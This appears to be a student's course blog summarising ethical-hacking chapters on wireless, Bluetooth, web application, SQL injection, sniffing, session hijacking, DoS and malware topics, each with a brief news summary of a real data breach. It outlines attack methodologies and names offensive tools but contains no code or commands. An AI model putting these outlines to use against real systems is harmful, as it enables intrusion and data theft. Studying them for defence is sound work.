Blog 13

This chapter was about Wi-Fi, Bluetooth, and Mobile Devices

Wi-Fi

• Message integrity code: Uses verifiers that detect any changes to a message's content. 
• Wigle.net can be used to find out where hotspots are in a geographic area.
• Aircrack -ng is used on Linux to brute force a password for a Wi-Fi network.
• Use Wi-Fi predictive planning tools. It can help you place access points, wires, etc.
• Use RF scanning such as wireless intrusion prevention and wireless intrusion detection.
• DHCP snooping can be configured to drop DHCP requests that aren't from a trusted source.

Bluetooth

• BlueSmacking is a bluetooth denial of service attack.
• Bluejacking is sending unwanted data to a bluetooth device.
• Bluesnarfing is a way to gain access to a bluetooth device.
• Bluebugging is an attack that installs a backdoor into a device.
• Btlejuice is a framework used to perform man-in-the-middle attacks using a bluetooth device.
• Super Bluetooth Hack is an application that can be used to view files on another bluetooth device. It is an android application and you need to have JBED running on your device in order to use it.

Mobile Devices

• Rooting is overriding security features on an Android device to modify, remove, or change applications, run apps with admin privileges, change system settings, and gain low-level access to device hardware.
• Jailbreaking is essentially rooting but on iOS devices. 
• Hackode: The Hacker's Toolbox is an android application that can perform reconnaissance, scanning, and Google dorking.

Article

The article I read was about a security breach at Nintendo that compromised 160,000 accounts. Attackers hacked a legacy login system. Personal information as well as credit card numbers were leaked. I chose this article because I had gotten an email saying my Nintendo account was accessed from a strange location and I had to go in and change my password.

 https://threatpost.com/nintendo-confirms-breach-of-160000-accounts/155110/

Blog 12

This chapter was about web servers, web applications and SQL injections.

Web Servers

• A web server is a computer used to store and distribute web pages to clients.
• Web servers have many vulnerabilities.
• There are different types of server attacks.
• Website defacement: A website is vandalized or defaced. The hacker could also change the site's content.
• Directory traversal: This is when hacker tries to get into other folders and directories on a web server that are restricted.
• Cross-site scripting: Takes advantage of website's scripting defects. An attacker can alter the XSS to send malicious code to a user. 

 Web Applications

•  A web application is software that has been installed on top of a web server.
• They process, store, and distribute information.
• Upload bombing uploads a lot of files onto a server to crash it.
• Poison null byte attack sends special characters to the script
•  Cookies are a vulnerability as well

• Web application hacking methodology
• Start with footprinting the web infrastructure. 
• Whois lookup
• DNS interrogation
• Port Scanning
• Next scan for vulnerabilities using a vulnerability scanner
• Begin attacks to target those vulnerabilities, or even do a DOS or DDOS attack.
• Analyze web applications
• Identify entry point for user input.
• Identify which applications are provided to the client.
• Attack authentication mechanism by targeting implementation and errors in web applications.
• Attack authorization scheme
• Attackers modify input fields in http requests. 
• Query String
• HTTP header
• Attack session management mechanisms
•  Session token prediction
• Session Hijacking
• Man-in-the-middle attacks 
• Perform injection attacks
• Injects malicious code into an input string to modify a database or alter a website.
• Code injection when the hacker inputs code that is executed by the application.
• Command injection when the hacker inputs code that alters the functionality of execution commands.
• Attack flaws in application logic
• Attack database connectivity
• Attack the web client application

•  Penetration Testing Methodology
• Information gathering about target system or network
• Active and cached web pages
• Error Messages
• Entry points 
• Web applications
•  Check configuration settings
• Complete application configuration management 
• Use CGI scanners
• Review web server content, configuration files, and log files.
• Test for hidden file extensions and check locations of old backup and configuration files.
• Administrative Interfaces
• Review HTML and source code. Watch for comments and coding tags.
• Authentication Testing
• Password reset
• Session timeout
• Browser cache
• Password error or lockout feature

• Session Management Testing
• Cookies
• Session fixations
• Exposed session variables
• Cross-site forgery requests.
• Denial-of-service testing
• Account lockouts
• Buffer overflows
• User object allocation
• Data validation
• Input vulnerabilities
• Character type or count
• Authorization testing
• Document all findings during the test

SQL Injections

•  A language that was designed to request data from a database.
• SQL injection is an attack that attacks a web application by manipulating SQL statements entered into a web page.
• They target flaws in web applications.
• They exploit input vulnerabilities.
• They use existing code.

• SQL Injection Methodology
• Information Gathering
• See if web application is connected to a database server
• Inject codes into fields to generate error messages

•  Test for SQL injection vulnerabilities. 
• Launch an SQL injection attack
• In-band: One communication channel to attack and gather results.
• Error-based: Depends on error messages
• Union-based: Uses the UNION operator to combine results of multiple SELECT statements into one result.
• Blind SQL: You receive true or false results.
• Content-based blind SQL: Uses a query to alter the HTTP response differently for a true or false answer.
• Time-based blind SQL: Alters the HTTP response time for a true or false answer.
• Advanced SQL Injection: Database, table, and column enumeration. Password grabbing.

Article

The article I read was about a security breach at Beaumont Health. 112,000 people's information was leaked nearly a year ago. Details leaked included names, dates of birth, social security numbers, medical conditions, bank account information, and drivers licenses. Doesn't say they caught the hacker but they have implemented better training and education for their employees.


 https://www.freep.com/story/news/health/2020/04/17/beaumont-health-security-breach-personal-information/5155716002/

Blog 11

This chapter was about IDS, firewalls, and honeypots

IDS

• There are different types of intrusion detection systems. 
• Network Intrusion Detection
• Host intrusion detection
• Signature-based: compares network traffic to known signatures
• Anomaly-based: compares network and host behavior to baseline profiles
• Protocol-based: detects anomalies specific to a given protocol

Firewalls

• Packet-filtering firewalls distinguish between good and bad traffic.
• A bastion host is a boundary firewall, which lets public and internal interfaces connect. 
• A screened hubnet uses a single firewall to protect multiple interfaces.
• Firewalking is using TCP and UDP packets to determine configuration of ACL's.
• There are many evasion techniques that can be used to avoid a firewall.
• Spoofing is when the hacker changes addressing information in the IP packet header to trick the firewall into thinking its from a trusted host.
• Source routing is when a packet is sent to different places first before getting to the target destination. This attempts to evade the firewall.

Honeypots

• A honeypot is a physical or virtual device designed to look like a legitimate network resource to draw in a hacker.
• There are different levels of honeypots.
• Low-Level: Simulates a number of services and applications.
• Medium: Simulates a real OS, applications, and services.
• High: Simulates all services and applications.

Article

 The article I read was about a company called Wappalyzer. They disclosed this security breach after the attacker starting emailing users offers to sell the company's database. The attacker had accessed one of the databases that had a misconfiguration. The hacker was not caught.


 https://www.zdnet.com/article/wappalyzer-discloses-security-breach-after-hacker-starts-emailing-users/

Blog 10

This chapter was about sniffers, session hijacking, and Denial of Service

Sniffing

• Promiscuous mode gives the network interface permission to grab every frame that comes its way. 
• Popular sniffing tools include Wireshark, TCPDump, Cain and Abel, etc.
• ettercap is an easy tool to use to do ARP poisoning, or man in the middle attack.
• DNS Spoofing is an attacker redirecting DNS traffic. It redirects a target system to another site.
• Invest in reliable security tools to protect against sniffing and attacks.
• Use more secure protocols for Internet traffic.
• Use switched networks to better isolate segments of the network.

Session Hijacking

• Taking over a session between a host and a web server. 
• Five steps to hijacking a session.
•  Sniffing
• Monitor Traffic
• De synchronize the current session 
• Predict the session ID
• Inject commands that target the server

•  Cross-site scripting is injecting malicious code into web applications. This is usually done through user-created content that has not been checked. For example, a Craigslist post could have malicious code attached that is not visible, but is able to steal cookie information.
• Burp Suite is really useful and has many different tools. It's a Linux program.
• Really have gotten the hang of using Session ID's to use cookies to login to a site. It's really easy.

Denial Of Service

• When a computer is used to flood a server with more packets than it can handle.
• Distributed Denial Of Service is when numerous computers are used to overload target systems.
• Limit access points the network
• Reduce unnecessary services 
•  Use anti-malware, threat prevention, and intrusion protection

Article


 The article I read was about a company called RigUp. The breach exposed more than 70,000 files. The files belong to US energy sector clients. If it had been exposed to malicious hackers or the general public, it would have been devastating. These files included human resources information, such as social security numbers, resumes, photos, paperwork, birth dates, insurance, etc. The company is going to do a root cause analysis to find out why the leak happened.

Blog 9

This chapter was about malware.

• A crypter is software that prevents the malware code from being analyzed and reverse-engineered. It also prevents detection from anti-virus software.
• Sheep dipping is analyzing emails, files, and systems for malware.
• Terminate and stay resident is a virus that sits in RAM and infects anything opened on the system until the computer is shut down or rebooted.
• Learned about different kinds of viruses, back doors, worms, and malware. 
• I learned about malware analysis, including sheep dipping, static analysis, and dynamic analysis
• Heuristic algorithms generate fairly accurate results in a short amount of time. It focuses on speed instead of accuracy and completeness.
• I learned the commands to use with netstat.

Article

The article I read about was a security breach at Marriott Hotels. Information exposed was emails, names, addresses, phone numbers,and birthdays. This was accessed using login credentials of two employees at a franchise property. 5.2 million guests information were compromised. Didn't say if they caught them.

https://www.cnet.com/how-to/marriott-data-breach-exposes-over-5-million-people-latest-major-security-hack/